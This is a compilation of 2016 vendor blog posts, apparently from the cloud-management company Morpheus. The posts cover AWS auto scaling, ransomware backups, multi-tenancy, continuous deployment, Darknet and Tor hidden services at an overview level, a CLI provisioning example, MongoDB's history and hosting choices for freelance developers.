Cloud Services’ Greatest Hits: Auto Scaling, and Automatic Backups

April 8, 2016, 5:43 pm

≫ Next: Cloud Multi-Tenancy Finds the Right Mix of Security and Scalability

≪ Previous: Why CAMP Technology Will Solve All Your Cloud Problems

Two of the most-compelling reasons to switch from in-house to cloud-based services are the efficiency of auto scaling, and the security of automatic backups.

If you believed everything you read, you’d think the cloud would single-handedly save the world and everything in it. When you cut through the hyperbole and look solely at results, you find that two of cloud services’ traditional strengths remain the key to their success. 1. The ability to scale compute, network, and storage resources dynamically and automatically, and 2. The security benefit, which is that automatic backups can be stored safely apart from potential threats, whether they be natural disasters or of the human-made variety.

Nobody could be blamed for thinking the “(fill-in-the-blank) as a service” hype has gotten way out of hand. Now that “everything as a service” and “anything as a service” have arrived, you would think the as-a-service possibilities had run their course.

But no. Recent permutations include education-as-a-service (which shares an acronym with email-as-a-service), delivery-as-a-service, and food-and groceries-as-a-service. Can dog grooming-as-a-service be far behind? (Don’t tell me – it’s already been done… somewhere.)

One more as-a-service pitch and your local IT manager is likely to drop a rack of idle servers on your head. It’s time to cut through the chatter and get to the heart of cloud-service advantages: more efficient use of your hardware, software, and human resources. The two cloud features that deliver the greatest efficiency bump for most organizations are auto-scaling and automatic backups.

Accommodate changes in resource demand without over-provisioning

If only auto-scaling your cloud services were as easy as pressing a big red “Scale” button. Amazon Web Services claims that its CloudWatch metrics let you scale EC2 instances dynamically, or if you prefer, you can set your own schedule for resource-demand peaks and valleys. In practice, however, AWS’s Auto Scaling sometimes fails to live up to its billing. In a September 2015 article, TechTarget’s Chris Moyer describes a situation in which AWS servers were still running, even though their services had stopped and would not restart.

AWS Auto Scaling works in conjunction with an elastic load balancer and the CloudWatch service to match resources to workloads, but some stopped services may not be detected on running servers. Source: Harish Ganesan, via Slideshare

Once the server stopped serving up requests, the Elastic Load Balancer (ELB) would disconnect from it. However, the AWS Auto Scaling group wouldn’t replace the server because it was still running. When the service ultimately stopped because all the servers were affected by the problem, Auto Scaling didn’t detect the problem, so it didn’t send an alert that the service failed and wouldn’t restart. The glitch could have been avoided if ELB health checks had been used in addition to EC2’s own health checks.

In Moyer’s case, a problem with the Auto Scaling group configuration was causing a server to be killed and relaunched continuously: Every 5 minutes a new server was launched and an old one was ended. Since the minimum billing time for each AWS instance is one hour, the constant stopping and starting was increasing the tab by a factor of 12. (Once the discrepancy was discovered and the problem fixed, Amazon credited the resulting overcharge, as well as similar overpayments in the two previous months.)

To prevent such constant relaunches, Moyer recommends subscribing to notifications on Auto Scaling groups. When you find that AWS is spinning up and replacing servers unnecessarily, either disable an availability zone or stop the group from executing any actions. You also have to make sure ELB is giving servers a sufficient grace period before deciding the server isn’t starting correctly.

Morpheus' app and DB management service, makes it easy to avoid having your auto-scaling operations run amok. For example, Morpheus’s Instance Summary Panel shows three types of status graphs: Memory (cache, used, and max), Storage (used and max), and CPU (system and user). The server summary also lists all containers, including the name, location, type, IP address, port, memory, storage, and status of each. You can instantly stop, start, or restart an instance via the panel’s drop-down menu.

Automatic backups ensure you’re prepared for any data calamity

You never know what hazard will be the next to threaten your organization’s most important data. In a November 15, 2015, article, security expert Brian Kreps reports on the latest iteration of ransomware that targets websites hosted on Linux servers. In April 2015 CheckPoint identified the vulnerability in the Magento shopping-cart software that the virus writers exploited, and a patch was released soon thereafter. However, many ecommerce sites remain unpatched, and sites continue to be victimized by the ransomware, according to Krebs.

The best defense against ransomware and other data risks is to back up all critical data automatically to a secure cloud-backup service. As IT Pro’s Davey Winder reports in a November 17, 2015, article, the FBI took much heat when the agency recommended that victims of ransomware simply pay the ransom. While that may free your hostage data in the short term, it empowers and emboldens the cybercriminals to target even more of your sensitive data – and to demand higher payoffs to liberate it. Of course, there’s always the risk that the crooks will take the money and run – without releasing your data.

Winder is one of several security analysts who recommend strongly that you never pay ransom for your hostage data. It’s safer, cheaper, and more socially responsible to simply restore your data from your near-real-time backup. The standard advice is to have both local and cloud backups, but the key is to have at least one current backup of all important data that is “air-gapped,” meaning it has no connection – wired or wireless – to the computers and networks that are at risk of infection by ransomware.

The CryptoWall ransomware continues to infect systems around the world. As of late 2014 the virus had infected more than a quarter million systems in the U.S. alone. Source: Dell SecureWorks

Cloud backups of your critical apps and databases don’t get simpler, safer, or more efficient than those you create automatically via the Morpheus service. Not only does Morpheus automatically collect system, application, and database logs for all provisioned systems, each new app or database stack component is backed up automatically. You can define the frequency of your backups, as well set the destination (local or cloud) without having to write custom cron jobs.

Cloud management services such as Morpheus are increasing in popularity for a very good reason, or rather for three very good reasons: efficiency (resource consumption increases and decreases as your needs dictate); availability (access your apps and data from any location); and security (protect your valuable data assets from natural and human-made threats). That’s a prospect IT managers are finding more and more difficult to ignore.

To see what Morpheus can do for you, click here to sign up for a FREE 30-day trial.

↧

Cloud Multi-Tenancy Finds the Right Mix of Security and Scalability

April 8, 2016, 5:43 pm

≫ Next: How to Reduce App Deployment Time — Fast

≪ Previous: Cloud Services’ Greatest Hits: Auto Scaling, and Automatic Backups

By offering enhanced security as well as efficient scalability, multi-tenancy has become the cloud’s most important attribute.

Once perceived as the weak link in the cloud-security chain, multi-tenancy has evolved to become not only the foundation of the efficiencies the cloud is noted for, but also the key to keeping your organization’s valuable applications and data secure. By sharing a single codebase, cloud apps and data can be patched and updated much faster than is possible when they reside in your company’s internal networks.

Multi-tenancy is a cornerstone of cloud computing. It is the key to the cloud’s elastic scalability and other cost efficiencies. But when it comes to multi-tenancy’s data-management benefits, on-demand scalability is the tip of the iceberg. In particular, organizations of all sizes are coming to appreciate the enhanced security of the multi-tenant architecture, particularly when compared to the increasing difficulty of securing in-house data centers.

Ironically, security was often cited as a weakness of multi-tenancy in the early days of cloud computing. It didn’t take long for that perception to do a 180. As Forbes’ Tom Groenfeldt reports in a December 1, 2015, article, IT departments tend to overestimate their ability to secure their in-house networks.

Groenfeldt cites a recent report that found in-house breaches can take weeks or months to discover and patch, whereas cloud services have up-to-date tools and qualified staff to detect and correct security vulnerabilities before they can be exploited. In fact, near-constant security auditing is often a requirement for cloud services to earn the certification their infrastructures require, according to Groenfeldt.

Multi-tenancy distinguishes true cloud services from mere ‘hosted’ apps

Multi-tenancy is also a feature that distinguishes cloud services from the data-hosting offerings of third parties that merely move the customer’s apps and databases from a server in their data center to an identical server at the service provider’s site. This practice is referred to as “cloud washing” by DataInformed’s Bil Harmer in a November 30, 2015, article. Harmer states that multi-tenancy is a fundamental aspect the three major cloud categories: infrastructure as a service (IaaS), platform as a service (PaaS), and software as a service (SaaS).

All three major cloud categories rely on multi-tenancy to deliver the elastic scalability that is the cornerstone of cloud-service efficiency. Source: Forrester Research

Harmer identifies three must-have features of true multi-tenancy:

Multiple customers, or tenants, use the same application or set of applications
All the tenants share the same architecture
Each tenant’s instances are completely separate from those of all other tenants

When a vendor simply runs its legacy software in multiple virtual machines, it is merely hosting those isolated apps, not delivering cloud applications, according to Harmer. If the vendor claims to be offering a multi-tenant environment for such hosted apps, it is cloud washing. Not that there’s anything wrong with app-hosting services. It’s just not appropriate to market such products as cloud-based.

The primary difference is that when you need more capacity in a hosted service, the vendor will issue a Statement of Work (SoW) that states explicitly what resources you are contracting for: hardware, installation, maintenance, licensing, and support. By contrast, a cloud service scales capacity on demand, and because all tenants share a single codebase, everyone benefits automatically when that codebase is patched or upgraded, without requiring any renegotiation.

How multi-tenancy balances sharing with security

Back in 2011, Oracle CEO Larry Ellison told the Oracle Open World conference that his company’s “cloud” solution was more secure than that of rival Salesforce.com because Oracle’s service did not use multi-tenancy, while Salesforce.com’s offering did. As Forrester Research’s James Staten and John R. Rymer point out in the definitive whitepaper Understanding Cloud’s Multitenancy (pdf), Ellison was wrong on two counts:

In fact, both Oracle and Salesforce.com provide multi-tenant solutions, although the two services use different architectures to balance economies of scale with security.
Likewise, both companies’ cloud services are secure when properly configured, assuring that each tenant is autonomous, while all tenants receive equally consistent experience, performance, and reliability of shared resources.

Tenant autonomy is achieved by isolating tenants at three points in the cloud architecture:

By restricting access to the cloud service itself, often by limiting the network addresses from which a tenant is allowed to submit requests
By restricting access to individual apps and resources, using either the dedicated resource model or the metadata map model
By restricting access to the data, typically by dedicating a database to each tenant, again using either the dedicated resource model or metadata map model.

The two principal methods used by cloud services to ensure tenant autonomy in multi-tenant architectures are the dedicated resource model and the metadata map model. Source: Forrester Research

The primary difference between the two models is that the former provides each customer with a fixed set of logical resources that are clearly defined, packaged, priced, and allocated; while the latter “hides” all processor, storage, and network resources behind metadata and keeps the metadata separate from the data and resources. The dedicated resource approach is more akin to traditional enterprise infrastructure management, while the metadata map model assigns objects to each tenant for all operational tasks as if they were organized into a container.

In reality, cloud services are likely to use a mix of these two approaches: the dedicated resource model for apps that were written originally for on-premises, single-tenant environments; and the metadata map model for apps and services designed with multi-tenancy in mind from the get-go. The Morpheus cloud application management platform supports both models in public, private, and hybrid cloud environments via its out-of-the-box integration with Amazon Web Services (AWS) and Openstack. Morpheus offers a single management console that lets you track servers, storage, and utilization in the cloud configuration of your choice.

↧

How to Reduce App Deployment Time — Fast

April 8, 2016, 5:43 pm

≫ Next: Darknet Busters: Taking a Bite Out of Cybercrime-as-a-Service

≪ Previous: Cloud Multi-Tenancy Finds the Right Mix of Security and Scalability

System changes occur so quickly that upgrades and updates have to be unobtrusive and ready to hit the ground running.

The changing nature of application development necessitates new methods for ensuring updates and patches are deployed in near-real time via automated testing and validation. The challenge is to deploy apps in a way that doesn’t hinder users’ access to your organization’s vital applications. To do so, you have to think small, and you have to be ready to respond to feedback as quickly as you receive it.

It’s almost certain that whatever software components your new application needs have already been written. “Application development” is now a matter of putting pre-existing software pieces together in an intelligent, problem-solving, revenue-generating way, with little or no original coding required. Then all you need is the most efficient combination of compute cycles, storage, network bandwidth, and database elements to support your apps.

What matters as much as development these days is continuous, almost-instantaneous updates, so you’re in a near-constant state of deployment. The goal is to update in the background, and in a way that minimizes interference with users.

Deployments: Small and focused
Testing: Fast and well-defined

The foundation of modern app development is API- and service-based access to functionality: Code and configuration repositories, source code, and configuration versioning and controls are required for rapid, focused, compartmentalized deployment. One key to the success of your app-development project is to involve the “Ops” side of DevOps from the get-go. This way, the operations staff can help define the supportability, testing, management, and security of the services comprising your applications.

Updates will often add new fields, modify forms and reports, customize or enhance dashboards, even add new use cases to expand the potential user base for the application. All of these changes make the app more complex. They also have the potential to conflict with other infrastructure components, and they may hinder performance and usability.

You can’t always know what changes you’ll have to make to the app in the future to keep it up-to-date. You have to develop with flexibility in mind. When you take a no-code, low-code approach to app development, you’re better able to make alterations quickly and precisely, with minimal impact on users.

Streamline testing, but not too much!

Continuous deployment depends on two things: Determining the lowest level of test coverage necessary for each deployment, and choosing automated testing tools that you can trust to do the job. In a November 13, 2015, post on DZone’s DevOps Zone, Moritz Plessnig identifies three principal benefits of continuous deployment:

Small, focused iterations are less likely to cause problems, and they’re also easier to troubleshoot.
Frequent updates maintain momentum and give users a sense of the app progressing.
Users get faster access to new features and are able to provide feedback quicker.

Continuous deployment moves changes through the deployment cycle automatically. Source: Yaniv Yehuda, via InfoQ

Plessnig considers three types of deployment tests to be indispensable:

The smoke test simply confirms that the system functions as it was designed to function. You want to make sure the various components work as expected in the production environment, not just in a simulated testbed.
Happy path story testing ensures that the sequence of actions users typically step through to complete a task operate as expected. Examples are the sign-in process, order entry, and product purchase. You have to test the “happy path” for each of these “user stories,” according to Plessnig. As with smoke tests, the happy path test must use production code and run in a production environment.
Integration testing verifies the application’s boundaries. It can take the place of unit testing, generative testing, mutation testing, and other traditional developer-focused tests. For example, classes and modules may run without a hitch in an isolated test environment but clash when they’re connected to a database, file system, or other external component.

Puppet adapts readily to changes in your infrastructure

One of the most popular ways to keep tabs on the configuration of your Linux servers is Puppet, which is available in both open-source and commercial versions. As reported in a November 25, 2015, article in Linux Journal, after you define the state of your IT infrastructure, Puppet enforces that state across OSes; physical, virtual, and cloud environments; network and storage devices; and applications. This includes initial code development, testing, production release, and updates; as well as provisioning of physical and virtual machines, orchestration, and reporting.

In the Puppet workflow, the agent collects information about the host and sends it to the server; the parser compiles an implementation for the host and returns it to the agent; and then the agent applies the configuration locally. Source: Luke Kanies, via Aosabook.org

The new Puppet Application Orchestration App is intended to serve as the single method for updating all of your application’s deployment tiers: from the application layer through all the infrastructure layers it supports. This lets you model distributed applications as Puppet code to take advantage of Puppet’s declarative model-based design. More than 3,500 Puppet modules are available for assembly into full models of distributed applications.

Morpheus helps customers of all sizes reduce application deployment time by more than 2x. To see how Morpheus can help your business, click here to sign up for a free demo.

↧

Darknet Busters: Taking a Bite Out of Cybercrime-as-a-Service

April 8, 2016, 5:43 pm

≫ Next: Using a CLI for App Development and Deployment

≪ Previous: How to Reduce App Deployment Time — Fast

The first step in combatting the perpetrators of Internet crimes is to uncover the Darknet in which they operate.

It's getting easier and easier for criminals to infiltrate your company’s network and help themselves to your financial and other sensitive information, and that of your customers. There's a ready market for stolen certificates that make malware look legitimate to antivirus software and other security systems.

The crooks even place orders for stolen account information: One person is shopping for purloined Xbox, GameStop, iTunes, and Target accounts; another is interested only in accounts belonging to Canadian financial institutions. Each stolen record costs from $4 to $10, on average, and customers must buy at least $100 worth of these hijacked accounts. Many of the transactions specify rubles (hint, hint).

Loucif Kharouni, Senior Threat Researcher for security service Damballa, writes in a September 21, 2015, post that the cybercrime economy is thriving on the so-called Darknet, or Dark Web. Criminals now offer cybercrime-as-a-service, allowing anyone with an evil inclination to order up a malware attack, made to order -- no tech experience required.

Criminal sites operate beyond the reach of law enforcement

Sadly, thieves aren't the only criminals profiting from the Darknet. Human traffickers, child pornographers, even murderers are taking advantage of the Internet to commit their heinous crimes, as Dark Reading's Sara Peters reports in a September 16, 2015, article.

Peters cites a report by security firm Bat Blue Networks that claims there are between 200,000 and 400,000 sites on the Darknet. In addition to drug sales and other criminal activities, the sites are home to political dissidents, whistleblowers, and extremists of every description. It's difficult to identify the servers hosting the sites because they are shrouded by virtual private networks and other forms of encryption, according to Bat Blue's researchers.

Most people access the sites using The Onion Router (Tor) anonymizing network. That makes it nearly impossible for law enforcement to identify the criminals operating on the networks, let alone capture and prosecute them. In fact, Bat Blue claims "nation-states" are abetting the criminals, whether knowingly or unknowingly.

The Darknet is populated by everyone from public officials to religious extremists, for as wide a range of purposes. Source: Bat Blue Networks

While hundreds of thousands of sites comprise the Darknet, you won’t find them using the web’s Domain Name System. Instead, the sites communicate by delivering an anonymous service, called a “hidden service,” via updates to the Tor network. Rather than getting a domain from a registrar, the sites authenticate each other by using self-generated public/private key pair addresses.

The public key generates a 16-character hash that ends in .onion to serve as the address that accesses the hidden service. When the connection is established, keys are exchanged to create an encrypted communication channel. In a typical scenario, the user installs a Tor client and web server on a laptop, takes the laptop to a public WiFi access point (avoiding the cameras that are prevalent at many such locations), and uses that connection to register with the Tor network.

The Tor Project explains the six-step procedure for using a hidden service to link anonymously and securely via the Tor network:

Party A builds circuits to select introduction points on the Tor network.
A hidden service descriptor containing the public key and summaries of each introduction point, and signed by the private key, is uploaded to a distributed hash table on the network.
Party B finds the hidden service’s .onion address and downloads the descriptor from the distributed hash table to establish the protected connection to it.
Party B creates an “introduce” message encrypted to the hidden service's public key; the message includes the address of the rendezvous point and the one-time secret. The message is sent to one of the introduction points for delivery to the hidden service. (This step is shown in the image below.)
The hidden service decrypts the message, finds the rendezvous address and one-time secret, creates a circuit to the rendezvous point, and sends a rendezvous message that contains another one-time secret.
The rendezvous point notifies Party B that the connection has been established, and then Party B and the hidden service pass protected messages back and forth.

In the fourth of the six steps required to establish a protected connection to the Tor network, Party B (Ann) sends an “introduce” message to one of the hidden service’s introduction points created by Party A (Bob). Source: Tor Project

Defeating the Darknet starts by removing its cloak of invisibility

Criminals cannot be allowed to operate unfettered in the dark shadows of the Internet. But you can’t arrest what you can’t spot. That’s why the first step in combatting Darknet crime is to shine a light on it. That’s one of the primary goals of the U.S. Defense Research Projects Agency’s Memex program, which Mark Stockley describes in a February 16, 2015, post on the Sophos Naked Security site.

Memex is intended to support domain-specific searches, as opposed to the broad, general scope of commercial search engines such as Google and Bing. Initially, it targets human trafficking and slavery, but its potential uses extend to the business realm, as Computerworld’s Katherine Noyes reports in a February 13, 2015, article.

For example, a company could use Memex to spot fraud attempts and vet potential partners. However, the ability to search for information that isn’t indexed by Google and other commercial search engines presents companies with a tremendous competitive advantage, according to analysts. After all, knowledge is power, and not just for the crooks running amok on the Darknet.

↧

Using a CLI for App Development and Deployment

April 8, 2016, 5:43 pm

≫ Next: How Did MongoDB Get Its Name?

≪ Previous: Darknet Busters: Taking a Bite Out of Cybercrime-as-a-Service

Find out how a CLI can help your company with app development and deployment

A CLI can help developers and administrators get apps deployed quickly, in addition to the other uses of CLIs, such as automating tasks for an operating system or running helpful commands that can run a ping, get information on files, or execute file system commands.

What is a CLI?

CLI stands for command-line interface, though you might also hear of this under a different name or acronym, such as character user interface (CUI) or command-line user interface. A CLI allows a user to commands to a program using written text rather than a GUI (Graphical User Interface). For many years, CLIs were the main form of interacting with computers. The introduction of GUI operating systems such as Windows and Macintosh eventually made computer operation easier for beginners, but CLIs have remained as an alternate means of interaction, often employed by more advanced users such as administrators or developers.

Source: HubPages

How do CLIs help Administrators and Developers?

For administrators and developers, a CLI can be a handy tool for interacting with a particular piece of software. Whether it is an operating system, server, or another system, a CLI can provide you with the ability to provide additional parameters to the commands that you need to run. This sort of flexibility helps when you need to configure a command to run a particular way. For example, getting a directory listing in a CLI for Windows is done by typing “dir” and pressing “Enter”. This works well for short listings, but if that particular directory has a large number of files, you may not be able to see what you needed on the screen. To help with this, you can add the “/p” parameter, e.g., “dir /p”. This time, the CLI will display the number of files that will fit on a single page and allow you to continue as needed until you see what you need.

SaaS with a CLI

As an administrator or developer, you may be considering a SaaS package, and having a CLI to work with would be helpful. Morpheus is a service that offers exactly what you need: SaaS with a CLI for you to help your productivity. With the Morpheus CLI, you can quickly provision instances by typing in the necessary commands. For example, the interaction below will create a Node.js instance on Morpheus with ease:

$ morpheus instances add "My node app" node

Configurations:

1) Single Node (node-4.0.0-single)

Selection: 1

Select a Plan:

1) Memory: 128MB Storage: 1GB

2) Memory: 256MB Storage: 3GB

3) Memory: 512MB Storage: 5GB

4) Memory: 1GB Storage: 10GB

5) Memory: 2GB Storage: 20GB

6) Memory: 4GB Storage: 40GB

7) Memory: 8GB Storage: 80GB

8) Memory: 16GB Storage: 160GB

Selection: 1

↧

How Did MongoDB Get Its Name?

April 8, 2016, 5:43 pm

≫ Next: Hosting For Freelance Developers: PaaS, VPS, Cloud, And More

≪ Previous: Using a CLI for App Development and Deployment

Curious how MongoDB got its name? Here's your quick history lesson for the day.

Example of a MongoDB query. Source: MongoDB.

The company behind MongoDB

MongoDB was originally developed by MongoDB, Inc., which at the time (2007) was named 10gen. The company was founded by former DoubleClick founders and engineers, specifically Dwight Merriman, Kevin P. Ryan, and Eliot Horowitz.

At first, 10gen wanted to build an open-source platform as a service. The company wanted all of the components of its software to be completely open-source, but could not find a database that met their needs and provided the type of scalability needed for the applications they were building.

The platform 10gen was working on was named Babble and was going to be similar to the Google App Engine. As it turned out, there wasn't a big market for Babble, but both users and non-users of Babble agreed that the database 10gen had created to accompany the platform was excellent and would be happy to use it on its own.

While originally simply dubbed "p", the database was officially named MongoDB, with "Mongo" being short for the word humongous. Given the input 10gen had received about MongoDB, the company decided it would indeed be best to scrap the Babble project and release MongoDB on its own as an open-source database platform in 2009.

By 2012, 10gen had been named number nine on "The Next Big Thing 2012" published by the Wall Street Journal and had 6 offices located in various parts of the world. In 2013, 10gen renamed itself to MongoDB, Inc., wanting to make the strong association with its popular primary product.

The impact of MongoDB

As time went on, MongoDB moved up the ranks to become the most popular type of database for document stores, and the fourth most popular database system overall. It is used by other highly successful companies like eBay, Abobe, LinkedIn, Foursquare, McAfee, Shutterfly, and others.

It is also used by software developers as part of the MEAN stack, which includes MongoDB (database), Express (web app framework), AngularJS (MVC JavaScript front-end framework) and NodeJS (platform for server-side apps). Part of the popularity of this stack is that JavaScript and/or JSON/BSON notation can be used across all members of the stack, allowing developers to easily move through and develop within each piece of the stack.

The MEAN stack. Source: modernweb.

All in all, MongoDB can be an excellent choice for a database for your applications, especially if you deal with large amounts of data that will continually expand over time!

To see how Morpheus can help you get more out of your MongoDB sign up for a demo today!

↧

Hosting For Freelance Developers: PaaS, VPS, Cloud, And More

April 8, 2016, 5:43 pm

≫ Next: What is Data Logging

≪ Previous: How Did MongoDB Get Its Name?

By Nermin Hajdarbegovic, Technical Editor at Toptal

At a glance, the hosting industry may not appear exciting, but it's grunts in data centres the world over that keep our industry going. They are, quite literally, the backbone of the Internet, and as such they make everything possible: from e-commerce sites, to smart mobile apps for our latest toys. The heavy lifting is done in boring data centres, not on our flashy smartphones and wafer thin notebooks.

Whether you’re creating a virtual storefront, deploying an app, or simply doing some third-party testing and development, chances are you need some server muscle. The good news is that there is a lot to choose from. The hosting industry may not be loud or exciting, but it never sleeps; it’s a dog eat dog world, with cutthroat pricing, a lot of innovation behind the scenes, and cyclical hardware updates. Cloud, IaaS and PaaS have changed the way many developers and businesses operate, and these are relatively recent innovations.

In this post I will look at some hosting basics from the perspective of a freelance developer: what to choose and what to stay away from. Why did I underline freelance software engineers? Well, because many need their own dev environment, while at the same time working with various clients. Unfortunately, this also means that they usually have no say when it comes to deployment. For example, it’s the client’s decision how and where a particular web app will be hosted, and a freelancer hired on short-term basis usually has no say in the decision. This is a management issue, so I will not address it in this post other than to say that even freelancers need to be aware of options out there. Their hands may be tied, but in some cases clients will ask for their input and software engineers should help them make an informed decision. Earlier this week, we covered one way of blurring the line between development and operations: DevOps. In case you missed that post, I urge you to check it out and see why DevOps integration can have an impact on hosting as well.

Luckily, the hosting industry tries to cater to dev demand, so many of hosting companies offer plans tailored for developers. But wait, aren’t all webhosting plans just as good for developers as these “developer” plans? Is this just clever marketing and a cheap SEO trick?

Filtering Out the Noise

So, how does one go about finding the right hosting plan? Google is the obvious place to start, so I tried searching for “hosting for developers.” By now, you can probably see where I am going with this. That particular search yielded 85 million results and enough ads to make Google shareholders pop open a bottle of champagne.

If you’re a software engineer looking for good hosting, it’s not a good idea to google for answers. Here’s why.

There is a very good reason for this, and I reached out to some hosting specialists to get a better idea of what goes on behind the scenes.

Adam Wood, Web Hosting Expert and Author of Ultimate Guide to Web Hosting explained:

“Stay away from Googling ‘hosting for developers.’ That shows you hosts that have spent a lot of money on SEO, not a lot of energy on building an excellent platform.”

Wood confirmed what most of us knew already: A lot of “hosting for developers” plans are marketing gimmicks. However, he stressed that they often offer perfectly fine hosting plans in their own right.

“The ‘hosting’ is real, the ‘for developers’ part is just marketing,” he added.

Although Wood works for hosting review site WhoIsHostingThis, he believes developers searching for a new host should rely on more than online searches.

Instead of resorting to Google, your best bet for finding the perfect plan for your dev needs is word of mouth and old-fashioned research:

Check out major tech blogs from developers using the same stack as you.
Reach out to the community and ask for advice.
Take a closer look at hosting plans offered by your current host. Look for rapid deployment tools, integration to other developer tools, testing support and so on.
Make sure you have clear needs and priorities; there’s no room for ambiguity.
Base your decision on up-to-date information.

Small Hosts May Have Trouble Keeping Up

But what about the hundreds of thousands of hosting plans tailored for developers? Well, they’re really not special and in most cases you can get a similar level of service and support on a “plain Jane” hosting plan.

Is there even a need for these small and inexpensive plans? Yes, there is. Although seasoned veterans probably won’t use them, they are still a piece of the puzzle, allowing small developers, hobbyists and students to hone their skills on cheap, using shared hosting plans that cost less than a gym membership. Nobody is going to host a few local hobby sites on AWS, and kids designing their first WordPress sites won’t get a VPS. In most cases, they will use the cheapest option out there.

Cheap, shared hosting plans are the bread and butter of many hosting outfits, so you can get one from an industry leader, or a tiny, regional host. The trouble with small hosts is that most of them rely on conventional reseller hosting or re-packaging cloud hosting from AWS and other cloud giants. These plans are then marketed as shared hosting plans, VPS plans, or reseller plans.

Bottom line: If something goes wrong with your small reseller plan, who are you going to call in the middle of the night?

Small hosts are fading and this is more or less an irreversible trend. Data centres are insanely capital-intensive; they’re the Internet equivalent of power stations, they keep getting bigger and more efficient, while at the same time competing to offer lower pricing and superior service. This obviously involves a lot of investment, from huge facilities with excellent on-site security and support through air-conditioning, redundant power supply and amazingly expensive Internet infrastructure. On top of that, hosts need a steady stream of cutting edge hardware. Flagship Xeons and SAS SSDs don’t come cheap.

There is simply no room for small players in the data centre game.

Small resellers still have a role to play, usually by offering niche services or a localisation, including local support in various languages not supported by the big host. However, most of these niches and potential advantages don’t mean a whole lot for the average developer.

The PaaS Revolution

Less than a decade ago, the industry revolved around dedicated and shared hosting, and I don’t think I need explain what they are and how they work.

Cloud services entered the fray a few years ago, offering unprecedented reliability and scalability. The latest industry trends offer a number of exciting possibilities for developers in the form of developer-centric Platform-as-a-Service (PaaS) offerings.

PaaS is the new black for many developers. How does it compare to traditional hosting?

Most developers are already familiar with big PaaS services like Heroku, Pantheon and OpenShift. Many of these providers began life as platforms for a specific framework or application. For example, Heroku was a Ruby-on-Rails host, while Pantheon was a Drupal managed-hosting provider, which expanded to WordPress.

PaaS services can be viewed as the next logical step in the evolution of managed hosting. However, unlike managed hosting, PaaS is geared almost exclusively toward developers. This means PaaS services are tailored to meet the needs of individual developers and teams. It’s not simply about hosting; PaaS is all about integrating into a team’s preferred workflow by incorporating a number of features designed to boost productivity. PaaS providers usually offer a host of useful features:

· Ability to work with other developer tools like GitHub.

· Supports Continuous Integration (CI) tools like Drone.io, Jenkins, and Travis CI.

· Allows the creation of multiple, clonable environments for development, testing, beta, and production.

· Supports various automated testing suites.

Best of all, many PaaS providers offer free developer accounts. Heroku and Pantheon both allow developers to sample the platform, thus encouraging them to use it for projects later on. In addition, if one of these experimental projects takes off, developers are likely to remain on the platform.

It’s clever marketing, and it’s also an offer a lot of developers can’t afford to ignore. PaaS is here to stay and if you haven’t taken the plunge yet, perhaps it is time to do a little research and see what’s out there.

Traditional Hosting And Cloud Offerings

Dedicated and shared hosting aren’t going anywhere. They were the mainstays of web hosting for two decades and they’re still going strong. A lot of businesses rely on dedicated servers or VPS servers for their everyday operations. Some businesses choose to use cloud or PaaS for specific tasks, alongside their existing server infrastructure.

In some situations, PaaS can prove prohibitively expensive, but powerful dedicated servers don’t come cheap, either. The good news is that PaaS can give you a good idea of the sort of resources you will need before you decide to move to a dedicated server. Further, PaaS services tend to offer better support than managed VPS servers or dedicated servers.

Of course, all this is subjective and depends on your requirements and budget.

PaaS, dedicated servers, VPS plans, or your own slice of the Cloud. What should a freelance software engineer choose?

Call me old-fashioned, but I still believe dedicated servers are the best way of hosting most stuff. However, this only applies to mature projects; development is a whole other ball game. Managed dedicated servers offer exceptional reliability and good levels of support, along with good value for money.

Properly used, dedicated servers and PaaS can speed up deployment as well, as Adam Wood explains:

“I can spin up a new Ruby-on-Rails app on Heroku in a matter of minutes. Doing the same thing on AWS takes me a half a day, and I constantly feel like I’m about to break something.”

Cloud services are inherently more efficient than dedicated hardware because you only use the resources you need at any given time. For example, if you are operating a service that gets most of its traffic during office hours (from users in the Americas), your dedicated server will be underutilised for 12 to 16 hours. Despite this obvious efficiency gap, dedicated servers can still end up cheaper than cloud solutions. In addition, customers can customise and upgrade them the way they see fit.

Cloud is catching up, but dedicated servers will still be around for years to come. They’re obviously not a good solution for individual developers, but are for a lot of businesses. VPS plans cost a lot less than dedicated servers and are easily within the reach of individual developers, even though they don’t offer the same level of freedom as dedicated servers.

What Does This Mean For Freelancers?

The good news is that most freelance software engineers don’t need to worry about every hosting option out there. While it’s true that different clients have different ways of doing things, in most cases it’s the client’s problem rather than yours.

This does not mean that different hosting choices have no implications on freelancers; they do, but they are limited. It is always a good idea to familiarise yourself with the infrastructure before getting on board a project, but there is not much to worry about. Most new hosting services were developed to make developers’ lives easier and keep them focused on their side of the project. One of the positive side-effects on PaaS and cloud adoption is increasing standardisation; most stacks are mature and enjoy wide adoption, so there’s not a lot that can go wrong.

Besides, you can’t do anything about the client’s choice of infrastructure, for better or for worse. But what about your own server environment?

There is no one-size-fits-all solution; it all depends on your requirements, your stack, and your budget. PaaS services are gaining popularity, but they might not be a great solution for developers on a tight budget, or those who don’t need a hosting environment every day. For many freelancers and small, independent developers, VPS is still the way to go. Depending on what you do, an entry-level managed dedicated server is an option, and if you do small turnkey web projects, you may even consider some reseller packages.

The fact that big hosting companies continue to compete for developers’ business is, ultimately, a good thing. It means they’re forced to roll out timely updates and offer better support across all hosting packages in order to remain competitive. They are not really competing with PaaS and cloud services, but they still want a slice of the pie.

Remember how PaaS providers offer developers various incentives to get on board, just so they could get their business in the long run? It could be argued that conventional hosting companies are trying to do the same by luring novice developers to their platform, hoping that they will be loyal customers and use their servers to host a couple of dozen projects a few years down the road.

The Future Of Hosting

Although the hosting industry may not appear as vibrant and innovative as other tech sectors, this is not entirely fair. Of course, it will always look bland and unexciting compared to some fast-paced sectors, but we’re talking about infrastructure, not some sort of get rich quick scheme.

The hosting industry is changing, and it is innovative. It just takes a bit longer to deploy new technology, that’s all. For example, a logistics company probably changes its company smartphones every year or two, but its delivery vehicles aren’t updated nearly as often, yet they’re the backbone of the business.

Let’s take a quick look at some hosting industry trends that are becoming relevant from a software development perspective:

· Continual development and growth of Cloud and PaaS services.

· Evolution of managed hosting into quasi-PaaS services.

· Increasing integration with industry standard tools.

· New hardware might make dedicated servers cheaper.

Cloud and PaaS services will continue to mature and grow. More importantly, as competition heats up, prices should come down. The possibility of integrating various development tools and features into affordable hosting plans will continue to make them attractive from a financial perspective. Moving up on the price scale, managed hosting could also evolve to encompass some features and services offered by PaaS. If you’re interested in hosting industry trends, I suggest you check out this Forbes compilation of cloud market forecasts for 2015 and beyond.

